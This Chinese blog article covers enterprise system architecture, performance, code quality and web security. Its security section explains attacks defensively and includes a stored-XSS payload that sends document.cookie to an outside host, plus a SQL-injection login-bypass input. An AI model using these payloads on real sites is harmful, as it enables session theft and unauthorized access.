多层级集群，从Web服务器层、NoSQL层级数据库层都实现了集群，这样使得每一层的响应时间大大缩短，从而能够在单位时间内响应更多请求；
NoSQL应用（Memcached)，在NoSQL领域Memcached和Redis都有大量的用户群，在这个架构里使用的是Memcached。
数据库读写分离，当前大多数数据库服务器支持主从机制或订阅发布机制，这样一来就为读写分离创造了条件，减少了数据库竞争死锁出发条件，使响应时间大为缩短（非数据库集群情况下还可以考虑分库机制）。
负载均衡，Nginx实现Web服务器的负载均衡，Memcached自带负载均衡实现。

2、某公司生产管理系统架构图

系统架构

上图是为某公司的一个分散型系统做的架构设计，这家公司拥有多个跨市、跨省的生产片区，在各片区都有自己的生态车间，各片区与总公司之间通过数据链路连接。这个系统的特点是所有的流水线上的产品都贴有唯一的条码，在生产线的某个操作位操作之前都会扫描贴在产品上的条码，系统会根据条码做一些检查工作，如：产品条码是否应被使用过（比如之前应发货给客户过）、产品是否完成了本道工序之前的全部必须完成工序，如果满足条件则记录当前操作工序名称、操作人、操作时间和操作结果等。

一件产品从上线到完成有数十道工序，而每月下线的产品有少则数十万、多则数百万，一个月下来的数据量也是不小的。特别是在跨厂区网络不稳定的情况下如何保证对生产的影响最小。

本系统架构特点：

所有业务逻辑集中在服务器端，并以Service形式提供，这样便于业务逻辑调整客户端能及时得到最新更新；
部署Service的服务器采用集群部署，Nginx实现调度；
NoSQL采用了Redis，与Memcached相比，Redis支持的数据类型更多，同时Redis带有持久化功能，可以将每个条码对应的产品的最终信息存储在Redis当中，这样一般的查询工作（如条码是否被使用、产品当前状态）都可以在Redis中查询而不是数据库查询，这样大大减轻了数据库压力；
数据库采用了主从机制，实现了读写分离，也是为了提高响应速度；
使用了消息队列MQ和ETL，将一些可以异步处理的动作存放在MQ中，然后由ETL来执行（比如订单完成后以邮件形式通知相关人员）；
实现了系统监控，通过Zabbix来对服务器、应用及网络关键设备实行7×24小时监控，重大异常及时邮件通知IT支持人员。

由于总部其它地方生产规模较小，所以生产分布未采用复杂架构，不过因为从客户处退回的不良产品都会在总部生产车间进行返修处理，因此总部生产系统需要保存分部生产车间数据，因此分部生产车间数据会同时写进分部生产数据库和分部MQ服务器，然后由总部ETL服务器读取写入到总部系统中。在分部与总部网络中断的情况下分部系统仍可独立工作，直到网络恢复。

二、系统质量保证

1、单元测试

单元测试是指对软件中的最小可测试单元进行检查和验证。通常而言，一个单元测试是用于判断某个特定条件（或者场景）下某个特定函数的行为，常见的开发语言都有对应的单元测试框架，常见的单元测试工具：Junit/Nunit/xUnit.Net/Microsoft.VisualStudio.TestTool

关于单元测试的重要性和如何编写单元测试用例，在本篇就不详述了，网上有大量相关的文章。总之，越大型的系统、越重要的系统，单元测试的重要性越大。

针对一些需要外部依赖的单元测试，比如需要Web容器等，可以使用mock测试，Java测试人员可以使用EasyMock这个测试框架，其网址是http://easymock.org/。

2、代码质量管理平台

对于多人参与的团队项目，虽然大多数情况下会有编码规范拉指导大家如何编写团队风格一致的编码，但不能保证团队中每个成员、尤其是后期加入的团队成员仍能按照编码规范来编写代码，因此需要有一个平台来保证，在这里推荐SonarQube。

SonarQube是一个开源平台，用于管理源代码的质量。Sonar不只是一个质量数据报告工具，更是代码质量管理平台。支持的语言包括：Java、PHP、C#、C、Cobol、PL/SQL、Flex 等。

主要特点：

代码覆盖：通过单元测试，将会显示哪行代码被选中
改善编码规则
搜寻编码规则：按照名字，插件，激活级别和类别进行查询
项目搜寻：按照项目的名字进行查询
对比数据：比较同一张表中的任何测量的趋势

当然除了代码质量管理平台外，还有借助源代码管理系统，并且在每次提交代码前进行代码审核，这样每次代码的异动都可以追溯出来。我管理和经历过的一些重要系统中采用过这样的做法：除了管理所有程序代码之外，还将系统中数据库中的表、视图、函数及存储过程的创建都使用源代码版本管理工具管控起来，而且粒度很小，每个对象的创建都是一个SQL文件。这种方式虽然操作起来有些琐碎，但对于代码的变迁追溯非常方便。

三、系统性能保证

1、缓存

所谓缓存就是将一些频繁使用、但改动相对不平凡的数据保存在内存中，每次更新这些数据的时候同时持久化到数据库或文件系统，并同步更新到缓存中，查询的时候尽可能利用缓存。

缓存的实现方法：自定义实现或利用NoSQL。

自定义实现

自定义实现可利用SDK中提供的类，如Dictionary等。

优点：可以局部提高查询效率；
缺点：不能跨应用、跨服务器，仅限于单个应用；没有较好缓存生命周期管理策略。

NoSQL

Memcached

优点：可以跨应用、跨服务器，有灵活的生命周期管理策略；支持高并发；支持分布式。
缺点：不支持持久化，仅在内存存储，重启后数据丢失，需要“热加载”；仅支持Key/Value。

Redis

优点：可以跨应用、跨服务器，有灵活的生命周期管理策略；支持高并发；支持集群；支持持久化；支持Key/Value、List、Set、Hash数据结构；

以上几种方法都存在一个特点：需要通过Key去寻找对应的Value、List、Set或Hash。

除了Memcached和Redis之外，还出现了一些NoSQL数据库和支持NoSQL的数据库，前者如MongoDB，后者如PostgreSQL（>V9.4），下面是一个MongoDB与PostgreSQL的NoSQL特性的对比：

Redis

文档型NoSQL数据库的特点：

不定义表结构

即使不定义表结构，也可以像定义了表结构一样使用，还省去了变更表结构的麻烦。

可以使用复杂的查询条件

跟键值存储不同的是，面向文档的数据库可以通过复杂的查询条件来获取数据，虽然不具备事务处理和Join这些关系型数据库所具有的处理能力，但初次以外的其他处理基本上都能实现。

NoSQL主要是提高效率，关系数据库可以保证数据安全；各有使用场景，一般的企业管理系统，没多少并发量没必要使用NoSQL，互联网项目或要求并发的NoSQL使用比较多，但是最终重要的数据还是要保存到关系数据库。这也是为什么很多公司会同时使用NoSQL和关系型数据库的原因。

2、异步

所谓异步就是调用一个方法后并不等该方法执行完毕后再继续执行后续的操作，而是调用完毕后马上等待用户的其它指令。打印机管理程序就是一个异步的例子，某个人可能有几个数百页的文档需要打印，可以在打开一个文档之后点击打印，然后继续打开另一个文档继续点打印。尽管打印数百页文档需要较长时间，但后续的打印请求会在打印管理程序中排队，等第一个文档打印完成后再继续第二个文档的打印。

异步有两个层面：编程语言层面的异步和通过消息队列等机制实现的异步。

语法层面异步：像Java/C#等大多数语言都支持异步处理。

消息队列实现异步

用消息队列实现异步只是消息队列的一个基本功能之一，消息队列还具有如下功能：

解耦
灵活性 & 峰值处理能力
可恢复性
送达保证
排序保证
缓冲
理解数据流
异步通信

注：消息队列成为在进程或应用之间进行通信的最好形式。消息队列队列是创建强大的分布式应用的关键。

常用消息队列有如下，可根据系统特点和运维支持团队的掌握程度选择：

MSMQ
ActiveMQ
RabbitMQ
ZeroMQ
Kafka
MetaMQ
RocketMQ

3、负载均衡

负载均衡是根据某种负载策略把请求分发到集群中的每一台服务器上，让整个服务器群来处理网站的请求。

常见负载均衡方案

Windows负载均衡：NLB
Linux负载均衡：LVS
Web负载均衡：Nginx
硬件级负载均衡：F5

前面几种都是免费的解决方案，F5作为一种硬件及解决方案在一般企业很少用到。我目前知道的仅有一家世界级饮料公司使用了F5作为负载均衡解决方案，因为这个方案据说相当昂贵。

4、读写分离

读写分离为了确保数据库产品的稳定性，很多数据库拥有双机热备功能。

也就是，第一台数据库服务器，是对外提供增删改业务的生产服务器；第二台数据库服务器，主要进行读的操作。

原理：让主数据库（master）处理事务性增、改、删操作（INSERT、UPDATE、DELETE），而从数据库（slave）处理SELECT查询操作。

一般情况下我们是在代码中进行处理，但目前也有不少商业中间件形式的读写分离中间件，能自动将读写数据库操作调度到不同数据库上。

数据库

在大型系统中，有时候主、从数据库都是一个集群，这样可以保证响应速度更快，同时集群中单台服务器故障也不影响整个系统对外的响应。

四、系统安全性保证

1、XSS攻击

防范XSS攻击

XSS攻击类似于SQL注入攻击，攻击之前，我们先找到一个存在XSS漏洞的网站，XSS漏洞分为两种，一种是DOM Based XSS漏洞，另一种是Stored XSS漏洞。理论上，所有可输入的地方没有对输入数据进行处理的话，都会存在XSS漏洞，漏洞的危害取决于攻击代码的威力，攻击代码也不局限于script。

DOM Based XSS

DOM Based XSS是一种基于网页DOM结构的攻击，该攻击特点是中招的人是少数人。

Stored XSS

Stored XSS是存储式XSS漏洞，由于其攻击代码已经存储到服务器上或者数据库中，所以受害者是很多人。假如有两个页面，一个负责提交内容，一个负责将提交的内容（论坛发帖、读帖就是这种形式的典型）：

提交内容：<script>window.open(“www.b.com?param=”+document.cookie)</script>
页面内容：<%=request.getParameter(“content”)%>

这样用户在a站提交的东西，在显示的时候如果不加以处理就会打开b站页面将相关敏感内容显示出来。

针对XSS攻击的防范办法：

Html encode
特殊字符过滤：<,>

2、SQL注入

SQL Injection

所谓SQL注入式攻击，就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的SQL命令。在某些表单中，用户输入的内容直接用来构造（或者影响）动态SQL命令，或作为存储过程的输入参数，这类表单特别容易受到SQL注入式攻击。

例如我们在登录一个系统时，在软件底层按照如下方式查询数据：

登录SQL语句：

SELECT COUNT(*) FROM Login WHERE UserName=’admin’ AND Password=’123456‘
SELECT COUNT(*) FROM Login
WHERE UserName=’admin’–
Password=’123′

SQL

针对SQL注入防范办法：

数据输入验证
特殊字符过滤：特殊字符过滤
参数化SQL语句（包括存储过程）
不使用sa级别账户作为连接账户或限制连接IP

3、CSRF攻击

CSRF（Cross-site request forgery）跨站请求伪造，也被称为“One Click Attack”或者Session Riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。尽管听起来像跨站脚本（XSS），但它与XSS非常不同，并且攻击方式几乎相左。XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比，CSRF攻击往往不大流行（因此对其进行防范的资源也相当稀少）和难以防范，所以被认为比XSS更具危险性。

其核心策略是利用了浏览器Cookie或者服务器Session策略，盗取用户身份。
针对CSRF攻击防范办法：

表单Token
验证码
Referer检查
关键操作身份确认

4、其它攻击

Error Code:即错误代码回显，许多Web服务器为调试方便默认显示详尽错误信息，如错误发生的上下文、服务器及应用信息等，容易被恶意利用。

系统或者框架漏洞：如IIS6.0以下版本存在“JPG漏洞”；Apache Struts2服务在开启动态方法调用任意方法漏洞（CVE-2016-3081）；OpenSSL的heartbeat漏洞（CVE-2014-0160）；Apache解析漏洞；Nginx（<V0.8.37)空字节代码执行漏洞；IIS7.0及Nginx（<V0.8.37)畸形解析漏洞；文件上传漏洞；路径遍历漏洞；
防范办法：

上传文件时对MIME进行检查，必要情况下对上传文件更名
及时关注安全网站及产品官方网站，发现漏洞及时打补丁
对Web Server运用的用户角色权限进行限制
使用漏洞扫描工具模拟攻击

下面是一些我见过的被攻击后的系统截图，如下图是CCTV音乐频道被攻击的截图：

还有本人2008年前后搭建PHPWind运行的画面：

PHPWind

上图中是本人2006年前后搭建的一个论坛，有人利用系统漏洞注册了很多用户名为空的用户（其实是身份遗失）,，然后又利用这些账户在论坛中大量发布广告、色情等违法违纪的帖子，因为使用了一些不可见字符进行注册的，在后台无法管理，最后只好在数据库中操作管理了。

五、开发相关的经验教训

1、应用日志记录

以前团队运维着一个老系统，系统中没有日志功能，而系统的操作人员的计算机水平又较低，每次打电话都是说系统不能用或者是一些根本无法快速定位原因的描述，每次接到求助后需要花费大量时间来分析定位原因，后来将系统中增加了日志功能，并且在网络状态连通情况下可自动将错误日志以邮件形式发送到负责同事组成的用户组，自此以后处理这类问题的响应时间大大缩短了，双方都很满意。

现在已经有很多开源日志库，比如.NET的Log4Net，Java的Log4j，可以很轻松地配置启用日志功能。利用日志组件可以将信息记录到文件或数据库，便于发现问题时根据上下文环境发现问题，这一点在调试多线程时尤其重要。

日志级别：FATAL（致命错误）、ERROR（一般错误）、WARN（警告）、INFO（一般信息）、DEBUG（调试信息）。

注意：在调试环境中时日志级别尽量低（warn/info)，在生产环境中日志级别尽量高(error)，且对日志文件大小一定要进行控制。不然也会产生问题。

案例：某国内有名的管业集团公司的一个系统的重要模块发生问题，启用了日志功能以便通过日志组件快速将问题定位并修复。在发布到生产环境时，运行一段时间之后发现程序运行效率相当低下，多位开发人员对模块代码进行性能分析未发现问题，大家发现同样的数据量和操作在生产环境和开发环境效率差巨大，无意中发现生产服务器上日志文件已超过5G！事后发现是由于疏忽未调高日志级别且未对日志进行控制，调整日志模式为按日记录，问题解除。

参考：《log4net使用详解》 http://blog.csdn.net/zhoufoxcn/article/details/222053

2、历史记录追踪

代码管控

尽可能使用代码管控工具对源代码进行管控，如SVN/TFS/Git，如果有可能不但管控程序代码，还要管控数据库相关的SQL文件（包括初始化脚本及存储过程和使用ORM框架中的Mapping文件），做到系统的一切变动皆有记录。

代码审核

任何人提交代码都必须本人本地编译、调试无误后，再有人review后方可提交，且针对bug修复的提交需注明所修复的bug信息。

Bug记录

通过Bug记录系统记录整个bug的生命周期，包括发现、修复、关闭。TFS本身支持bug记录，开源系统中禅道也是一个不错的Bug记录工具。

六、总结

本篇主要是就系统从开发到最终部署运维过程中常用的技术、框架和方法做了一个总结，当然以上经验总结来源于本人从业以来所经历的项目中的经验和教训，可能还有更好更完美的方案，在此权当抛砖引玉

from:http://www.yunweipai.com/archives/22697.html